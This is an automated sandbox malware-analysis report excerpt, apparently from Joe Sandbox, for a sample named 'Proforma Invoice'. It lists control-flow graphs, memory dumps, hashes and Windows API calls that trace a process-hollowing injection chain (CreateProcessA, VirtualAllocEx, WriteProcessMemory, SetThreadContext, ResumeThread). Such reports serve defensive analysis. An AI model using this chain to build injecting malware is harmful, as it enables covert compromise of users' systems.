50bd1f1 29816->29815 29817->29815 29819 50bd11e 29818->29819 29821 50bd164 29818->29821 29822 50b9078 WriteProcessMemory 29819->29822 29823 50b9080 WriteProcessMemory 29819->29823 29820 50bd13f 29822->29820 29823->29820 29825 50bd244 29824->29825 29827 50bcc40 29824->29827 29834 50b89f8 ResumeThread 29825->29834 29835 50b89fc ResumeThread 29825->29835 29836 50b8a00 ResumeThread 29825->29836 29826 50bcb52 29826->29827 29832 50b8fb8 VirtualAllocEx 29826->29832 29833 50b8fc0 VirtualAllocEx 29826->29833 29827->29672 29828 50bcccd 29830 50b9078 WriteProcessMemory 29828->29830 29831 50b9080 WriteProcessMemory 29828->29831 29829 50bd13f 29830->29829 29831->29829 29832->29828 29833->29828 29834->29826 29835->29826 29836->29826 29838 50bcd51 29837->29838 29839 50bccf4 29838->29839 29840 50b9168 ReadProcessMemory 29838->29840 29841 50b916c ReadProcessMemory 29838->29841 29842 50b9170 ReadProcessMemory 29838->29842 29839->29672 29840->29839 29841->29839 29842->29839 29844 50bccaf 29843->29844 29847 50b8fb8 VirtualAllocEx 29844->29847 29848 50b8fc0 VirtualAllocEx 29844->29848 29845 50bcccd 29849 50b9078 WriteProcessMemory 29845->29849 29850 50b9080 WriteProcessMemory 29845->29850 29846 50bd13f 29847->29845 29848->29845 29849->29846 29850->29846 29852 50b8fc0 VirtualAllocEx 29851->29852 29854 50b903d 29852->29854 29854->29747 29856 50b9000 VirtualAllocEx 29855->29856 29858 50b903d 29856->29858 29858->29747 29860 50b90c8 WriteProcessMemory 29859->29860 29862 50b911f 29860->29862 29862->29748 29864 50b9080 WriteProcessMemory 29863->29864 29866 50b911f 29864->29866 29866->29748 29868 50b8a02 ResumeThread 29867->29868 29870 50b8a71 29868->29870 29870->29746 29872 50b8a02 ResumeThread 29871->29872 29874 50b8a71 29872->29874 29874->29746 29876 50b8a40 ResumeThread 29875->29876 29878 50b8a71 29876->29878 29878->29746 29880 50b8af5 Wow64SetThreadContext 29879->29880 29882 50b8b3d 29880->29882 29882->29757 29884 50b8ab0 Wow64SetThreadContext 29883->29884 29886 50b8b3d 29884->29886 29886->29757 29888 50b8ab2 Wow64SetThreadContext 29887->29888 29890 50b8b3d 29888->29890 29890->29757 29892 50b9391 29891->29892 29892->29892 29893 50b94f6 CreateProcessA 29892->29893 29894 50b9553 29893->29894 29896 50b92ee 29895->29896 29897 50b9303 CreateProcessA 29895->29897 29896->29672 29899 50b9553 29897->29899 29901 50b9172 ReadProcessMemory 29900->29901 29903 50b91ff 29901->29903 29903->29767 29905 50b91bb ReadProcessMemory 29904->29905 29907 50b91ff 29905->29907 29907->29767 29909 50b91bb ReadProcessMemory 29908->29909 29911 50b91ff 29909->29911 29911->29767

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 294 6eceac0-6eceae1 295 6eceae8-6ecebd4 294->295 296 6eceae3 294->296 298 6ecf3fc-6ecf424 295->298 299 6ecebda-6eced2b 295->299 296->295 302 6ecfb05-6ecfb0e 298->302 344 6ecf3ca-6ecf3f9 299->344 345 6eced31-6eced8c 299->345 303 6ecfb14-6ecfb2b 302->303 304 6ecf432-6ecf43b 302->304 306 6ecf43d 304->306 307 6ecf442-6ecf536 call 6ece668 304->307 306->307 326 6ecf538-6ecf544 307->326 327 6ecf560 307->327 330 6ecf54e-6ecf554 326->330 331 6ecf546-6ecf54c 326->331 329 6ecf566-6ecf586 327->329 336 6ecf588-6ecf5e0 329->336 337 6ecf5e5-6ecf65d 329->337 333 6ecf55e 330->333 331->333 333->329 350 6ecfb02 336->350 355 6ecf65f-6ecf6b2 337->355 356 6ecf6b4-6ecf6f7 call 6ece668 337->356 344->298 353 6eced8e 345->353 354 6eced91-6eced9c 345->354 350->302 353->354 357 6ecf2e0-6ecf2e6 354->357 382 6ecf702-6ecf708 355->382 356->382 359 6ecf2ec-6ecf369 357->359 360 6eceda1-6ecedbf 357->360 400 6ecf3b6-6ecf3bc 359->400 362 6ecee16-6ecee2b 360->362 363 6ecedc1-6ecedc5 360->363 365 6ecee2d 362->365 366 6ecee32-6ecee48 362->366 363->362 368 6ecedc7-6ecedd2 363->368 365->366 373 6ecee4f-6ecee66 366->373 374 6ecee4a 366->374 370 6ecee08-6ecee0e 368->370 375 6ecedd4-6ecedd8 370->375 376 6ecee10-6ecee11 370->376 377 6ecee6d-6ecee83 373->377 378 6ecee68 373->378 374->373 380 6ecedde-6ecedf6 375->380 381 6ecedda 375->381 385 6ecee94-6ecef05 376->385 383 6ecee8a-6ecee91 377->383 384 6ecee85 377->384 378->377 388 6ecedfd-6ecee05 380->388 389 6ecedf8 380->389 381->380 390 6ecf75f-6ecf76b 382->390 383->385 384->383 391 6ecef1b-6ecf093 385->391 392 6ecef07 385->392 388->370 389->388 394 6ecf76d-6ecf7f4 390->394 395 6ecf70a-6ecf72c 390->395 401 6ecf0a9-6ecf1e4 391->401 402 6ecf095 391->402 392->391 393 6ecef09-6ecef15 392->393 393->391 424 6ecf975-6ecf97e 394->424 397 6ecf72e 395->397 398 6ecf733-6ecf75c 395->398 397->398 398->390 405 6ecf3be 400->405 406 6ecf36b-6ecf3b3 400->406 414 6ecf248-6ecf25d 401->414 415 6ecf1e6-6ecf1ea 401->415 402->401 407 6ecf097-6ecf0a3 402->407 405->344 406->400 407->401 419 6ecf25f 414->419 420 6ecf264-6ecf285 414->420 415->414 417 6ecf1ec-6ecf1fb 415->417 423 6ecf23a-6ecf240 417->423 419->420 421 6ecf28c-6ecf2ab 420->421 422 6ecf287 420->422 428 6ecf2ad 421->428 429 6ecf2b2-6ecf2d2 421->429 422->421 430 6ecf1fd-6ecf201 423->430 431 6ecf242-6ecf243 423->431 426 6ecf7f9-6ecf80e 424->426 427 6ecf984-6ecf9df 424->427 434 6ecf817-6ecf963 426->434 435 6ecf810 426->435 453 6ecfa16-6ecfa40 427->453 454 6ecf9e1-6ecfa14 427->454 428->429 436 6ecf2d9 429->436 437 6ecf2d4 429->437 432 6ecf20b-6ecf22c 430->432 433 6ecf203-6ecf207 430->433 438 6ecf2dd 431->438 440 6ecf22e 432->440 441 6ecf233-6ecf237 432->441 433->432 455 6ecf96f 434->455 435->434 442 6ecf81d-6ecf85d 435->442 443 6ecf8ea-6ecf92a 435->443 444 6ecf8a7-6ecf8e5 435->444 445 6ecf862-6ecf8a2 435->445 436->438 437->436 438->357 440->441 441->423 442->455 443->455 444->455 445->455 462 6ecfa49-6ecfafb 453->462 454->462 455->424 462->350
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                  • API String ID: 0-2576840827
                                                                                                  • Opcode ID: c278a03abe375b0d4c0ac35adbb62a682537b63114a2ed24abcdf31f45cc0ade
                                                                                                  • Instruction ID: 22ebff3adfcc5736248a3ec8c510fef7d599e889c2d324435eb0066556b683b4
                                                                                                  • Opcode Fuzzy Hash: c278a03abe375b0d4c0ac35adbb62a682537b63114a2ed24abcdf31f45cc0ade
                                                                                                  • Instruction Fuzzy Hash: D9B2B375E00628CFDB54CF69C984AD9BBB2FF89304F1581E9E509AB265DB319E81CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1f3f4e4f7b1a0e03fefc072413795300a833eb770d3b87741c200c04ed7e0978
                                                                                                  • Instruction ID: 28a4dd51448d81ce1224a966aa1bc71faf0b177ae09a29c770f0096603fbb3d2
                                                                                                  • Opcode Fuzzy Hash: 1f3f4e4f7b1a0e03fefc072413795300a833eb770d3b87741c200c04ed7e0978
                                                                                                  • Instruction Fuzzy Hash: 76A00265DDF00586B000DD1430D52FCC13F521B009F403810065F3745205C1E408804D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 467 50b92fc-50b9301 468 50b92ee-50b92f0 467->468 469 50b9303-50b939d 467->469 472 50b939f-50b93a9 469->472 473 50b93d6-50b93f6 469->473 472->473 474 50b93ab-50b93ad 472->474 480 50b93f8-50b9402 473->480 481 50b942f-50b945e 473->481 475 50b93af-50b93b9 474->475 476 50b93d0-50b93d3 474->476 478 50b93bb 475->478 479 50b93bd-50b93cc 475->479 476->473 478->479 479->479 482 50b93ce 479->482 480->481 483 50b9404-50b9406 480->483 487 50b9460-50b946a 481->487 488 50b9497-50b9551 CreateProcessA 481->488 482->476 485 50b9429-50b942c 483->485 486 50b9408-50b9412 483->486 485->481 489 50b9416-50b9425 486->489 490 50b9414 486->490 487->488 491 50b946c-50b946e 487->491 501 50b955a-50b95e0 488->501 502 50b9553-50b9559 488->502 489->489 492 50b9427 489->492 490->489 493 50b9491-50b9494 491->493 494 50b9470-50b947a 491->494 492->485 493->488 496 50b947e-50b948d 494->496 497 50b947c 494->497 496->496 498 50b948f 496->498 497->496 498->493 512 50b95e2-50b95e6 501->512 513 50b95f0-50b95f4 501->513 502->501 512->513 516 50b95e8 512->516 514 50b95f6-50b95fa 513->514 515 50b9604-50b9608 513->515 514->515 517 50b95fc 514->517 518 50b960a-50b960e 515->518 519 50b9618-50b961c 515->519 516->513 517->515 518->519 520 50b9610 518->520 521 50b962e-50b9635 519->521 522 50b961e-50b9624 519->522 520->519 523 50b964c 521->523 524 50b9637-50b9646 521->524 522->521 525 50b964d 523->525 524->523 525->525
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 050B953E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID: nCy$nCy
                                                                                                  • API String ID: 963392458-1366251309
                                                                                                  • Opcode ID: 52c4d8077647c06c95205a0930e19f5331a5bf2a9719fb3911c5b1bc888e6618
                                                                                                  • Instruction ID: 428446d39f750f967ce6868d33fcce6403113ffbbea8fa382df5ef93dc68d47d
                                                                                                  • Opcode Fuzzy Hash: 52c4d8077647c06c95205a0930e19f5331a5bf2a9719fb3911c5b1bc888e6618
                                                                                                  • Instruction Fuzzy Hash: 4CA16071D002199FEF20CFA8D881BEEBBF2BF44314F1485A9D919A7250DB749985CF92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 527 50b9308-50b939d 529 50b939f-50b93a9 527->529 530 50b93d6-50b93f6 527->530 529->530 531 50b93ab-50b93ad 529->531 537 50b93f8-50b9402 530->537 538 50b942f-50b945e 530->538 532 50b93af-50b93b9 531->532 533 50b93d0-50b93d3 531->533 535 50b93bb 532->535 536 50b93bd-50b93cc 532->536 533->530 535->536 536->536 539 50b93ce 536->539 537->538 540 50b9404-50b9406 537->540 544 50b9460-50b946a 538->544 545 50b9497-50b9551 CreateProcessA 538->545 539->533 542 50b9429-50b942c 540->542 543 50b9408-50b9412 540->543 542->538 546 50b9416-50b9425 543->546 547 50b9414 543->547 544->545 548 50b946c-50b946e 544->548 558 50b955a-50b95e0 545->558 559 50b9553-50b9559 545->559 546->546 549 50b9427 546->549 547->546 550 50b9491-50b9494 548->550 551 50b9470-50b947a 548->551 549->542 550->545 553 50b947e-50b948d 551->553 554 50b947c 551->554 553->553 555 50b948f 553->555 554->553 555->550 569 50b95e2-50b95e6 558->569 570 50b95f0-50b95f4 558->570 559->558 569->570 573 50b95e8 569->573 571 50b95f6-50b95fa 570->571 572 50b9604-50b9608 570->572 571->572 574 50b95fc 571->574 575 50b960a-50b960e 572->575 576 50b9618-50b961c 572->576 573->570 574->572 575->576 577 50b9610 575->577 578 50b962e-50b9635 576->578 579 50b961e-50b9624 576->579 577->576 580 50b964c 578->580 581 50b9637-50b9646 578->581 579->578 582 50b964d 580->582 581->580 582->582
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 050B953E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID: nCy$nCy
                                                                                                  • API String ID: 963392458-1366251309
                                                                                                  • Opcode ID: 3d68521b4d06a755731d5af43d447c20669f8ff1371299f1447bb7b093f5052d
                                                                                                  • Instruction ID: 3ee075b51edf600b1b803701fd47336750a6437f84f003180566c4bf1fd66833
                                                                                                  • Opcode Fuzzy Hash: 3d68521b4d06a755731d5af43d447c20669f8ff1371299f1447bb7b093f5052d
                                                                                                  • Instruction Fuzzy Hash: E8917071D00219DFEB20CF68D881BEDBBF2BF44314F1485A9D919A7250DB749985CF92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 764 b85d0c-b85dd9 CreateActCtxA 766 b85ddb-b85de1 764->766 767 b85de2-b85e3c 764->767 766->767 774 b85e4b-b85e4f 767->774 775 b85e3e-b85e41 767->775 776 b85e60 774->776 777 b85e51-b85e5d 774->777 775->774 779 b85e61 776->779 777->776 779->779
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00B85DC9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1685134454.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_b80000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 2289755597-4268484829
                                                                                                  • Opcode ID: 032cd5a952ab24cfbc41a4fbbb64c88d05e2606dabc0b4e070c38538d6aa5232
                                                                                                  • Instruction ID: a8c90291fbd7b98b314b0548af758d6a555afd1df6e9822f28c3b51600e563c6
                                                                                                  • Opcode Fuzzy Hash: 032cd5a952ab24cfbc41a4fbbb64c88d05e2606dabc0b4e070c38538d6aa5232
                                                                                                  • Instruction Fuzzy Hash: A941E2B0C00719CBDB24DFA9C844BDDBBF5BF49304F2480AAD408AB265DB756946CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 780 b845a4-b85dd9 CreateActCtxA 783 b85ddb-b85de1 780->783 784 b85de2-b85e3c 780->784 783->784 791 b85e4b-b85e4f 784->791 792 b85e3e-b85e41 784->792 793 b85e60 791->793 794 b85e51-b85e5d 791->794 792->791 796 b85e61 793->796 794->793 796->796
                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00B85DC9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1685134454.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_b80000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 2289755597-4268484829
                                                                                                  • Opcode ID: 49f8820a1edb56d332c168b71d68c1d1eac9fff4fe6a1e87fb5d99af199ab7a3
                                                                                                  • Instruction ID: a118ac33dc279a59443e4c4186785c4841ead27ba25e96e48ba7aaa20856ccc6
                                                                                                  • Opcode Fuzzy Hash: 49f8820a1edb56d332c168b71d68c1d1eac9fff4fe6a1e87fb5d99af199ab7a3
                                                                                                  • Instruction Fuzzy Hash: DC41D1B0C00719CBDB24DFA9D844B9EFBF5BF49304F2480AAE408AB265DB756945CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 797 50b9078-50b90ce 800 50b90de-50b911d WriteProcessMemory 797->800 801 50b90d0-50b90dc 797->801 803 50b911f-50b9125 800->803 804 50b9126-50b9156 800->804 801->800 803->804
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 050B9110
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 3559483778-4268484829
                                                                                                  • Opcode ID: 83ee9c6c2d89c75a8531162fa508e9079a0b733d94df4c5147dec5a705d27e64
                                                                                                  • Instruction ID: b3ef60968ce5e0b85ad2915ed38d0e061da6d22d0e98f6d8af0a07daf5c80bc9
                                                                                                  • Opcode Fuzzy Hash: 83ee9c6c2d89c75a8531162fa508e9079a0b733d94df4c5147dec5a705d27e64
                                                                                                  • Instruction Fuzzy Hash: FD2168B69003599FCB10CFA9D885BEEBBF5FF48310F10882AE959A7240C7789544CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 808 50b9080-50b90ce 810 50b90de-50b911d WriteProcessMemory 808->810 811 50b90d0-50b90dc 808->811 813 50b911f-50b9125 810->813 814 50b9126-50b9156 810->814 811->810 813->814
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 050B9110
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 3559483778-4268484829
                                                                                                  • Opcode ID: cd06ffe6ef7125843191701d1c36e1f4fbfbff89774201d60a4ff3a5c29e7dd8
                                                                                                  • Instruction ID: 73398a312df5a40c1cb0669f1a2c0f2fd80ea83d3ae153b31b3e83f15177f9c1
                                                                                                  • Opcode Fuzzy Hash: cd06ffe6ef7125843191701d1c36e1f4fbfbff89774201d60a4ff3a5c29e7dd8
                                                                                                  • Instruction Fuzzy Hash: CE2136B19003599FDB10DFAAC885BDEBBF5FF48310F10882AE959A7250C7789944DBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 818 50b8aac-50b8afb 821 50b8b0b-50b8b3b Wow64SetThreadContext 818->821 822 50b8afd-50b8b09 818->822 824 50b8b3d-50b8b43 821->824 825 50b8b44-50b8b74 821->825 822->821 824->825
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050B8B2E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 983334009-4268484829
                                                                                                  • Opcode ID: 9046d7a06f468fb7814a7a072d32be8291ca54d27ad1cae2cf1bc2d53ae3e3f4
                                                                                                  • Instruction ID: 63c895a11cf7186990ce47d3fcd899a415a0c136d8cacdcd514722256144d1b8
                                                                                                  • Opcode Fuzzy Hash: 9046d7a06f468fb7814a7a072d32be8291ca54d27ad1cae2cf1bc2d53ae3e3f4
                                                                                                  • Instruction Fuzzy Hash: 372139B19002098FDB10DFAAC485BEEFBF4EF88324F14C42AD459A7250CB789585CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 840 50b9168-50b91fd ReadProcessMemory 844 50b91ff-50b9205 840->844 845 50b9206-50b9236 840->845 844->845
                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 050B91F0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 1726664587-4268484829
                                                                                                  • Opcode ID: 178969f82a6fef90cf2396a2b2d61a3bd5d3cdf573cc29f4b2bd413ac871e6dd
                                                                                                  • Instruction ID: 270e10fbca267f78c15134313cc0b25104b7785b8accd972a2f5ddc167df855f
                                                                                                  • Opcode Fuzzy Hash: 178969f82a6fef90cf2396a2b2d61a3bd5d3cdf573cc29f4b2bd413ac871e6dd
                                                                                                  • Instruction Fuzzy Hash: 1F2148B1C002599FDB10CFA9D885BEEFBF1FF48310F10882AE559A7250C7789944DB65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 829 50b8aa8-50b8afb 832 50b8b0b-50b8b3b Wow64SetThreadContext 829->832 833 50b8afd-50b8b09 829->833 835 50b8b3d-50b8b43 832->835 836 50b8b44-50b8b74 832->836 833->832 835->836
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050B8B2E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 983334009-4268484829
                                                                                                  • Opcode ID: 717a9cd89d8f8e6e6e143aca145cd2209ce228eba26571455066cfee97b0ec86
                                                                                                  • Instruction ID: e8e00168d7663791989da11b191c5c238b3645d17c37bd6266c5854f995ba4d3
                                                                                                  • Opcode Fuzzy Hash: 717a9cd89d8f8e6e6e143aca145cd2209ce228eba26571455066cfee97b0ec86
                                                                                                  • Instruction Fuzzy Hash: 232138B19042098FDB10CFA9C485BEEBBF5EF88314F14C42AD459A7250C7789986CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 050B91F0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 1726664587-4268484829
                                                                                                  • Opcode ID: c2358583fdcdb027c21054d6e19b73154ff90e2933cb08492b451056a7cffeaa
                                                                                                  • Instruction ID: f4e259cc750572918ae1e82a5343b485b743a3acb85d1120af665dcf98907016
                                                                                                  • Opcode Fuzzy Hash: c2358583fdcdb027c21054d6e19b73154ff90e2933cb08492b451056a7cffeaa
                                                                                                  • Instruction Fuzzy Hash: 192159B1C002599FCB10CFAAD985BDEFBF5FF48310F10882AE559A7250C7789544CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 050B91F0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 1726664587-4268484829
                                                                                                  • Opcode ID: bb48be74976fd2ba005d961638731e3b496e846357de2774c93c1c334c3ed255
                                                                                                  • Instruction ID: 691929814c60d2219078e1e4c6ae374e3270114427ca85d201c16154a6e955ce
                                                                                                  • Opcode Fuzzy Hash: bb48be74976fd2ba005d961638731e3b496e846357de2774c93c1c334c3ed255
                                                                                                  • Instruction Fuzzy Hash: 792128B1C002599FDB10DFAAC985BDEFBF5FF48310F108829E559A7250C7789544CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050B8B2E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 983334009-4268484829
                                                                                                  • Opcode ID: 62c59ef2c4063d45eb5db3b05d9fd3ea26a4fa469dde5b53c742d0013ed7bd59
                                                                                                  • Instruction ID: 390254f3c05a0a3b786b7eaf6e9e3c4cf145398b2fed94d0a4eb9e1442678c62
                                                                                                  • Opcode Fuzzy Hash: 62c59ef2c4063d45eb5db3b05d9fd3ea26a4fa469dde5b53c742d0013ed7bd59
                                                                                                  • Instruction Fuzzy Hash: 252118B19002098FDB10DFAAC585BEEFBF4EF88324F14C429D459A7251C7789985CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 050B902E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 4275171209-4268484829
                                                                                                  • Opcode ID: d0cec3fb63c1095ab5af8b841e93a6f2414697b2284120ac5f01120aacb52466
                                                                                                  • Instruction ID: dd4517815cd858cef00d86b81f051f67ed7b43962236cafa37e16e00f34fce4d
                                                                                                  • Opcode Fuzzy Hash: d0cec3fb63c1095ab5af8b841e93a6f2414697b2284120ac5f01120aacb52466
                                                                                                  • Instruction Fuzzy Hash: 091167728002499FCB20CFA9D845BEFBFF5EB88324F108419E519A7210C7759584CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 050B902E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 4275171209-4268484829
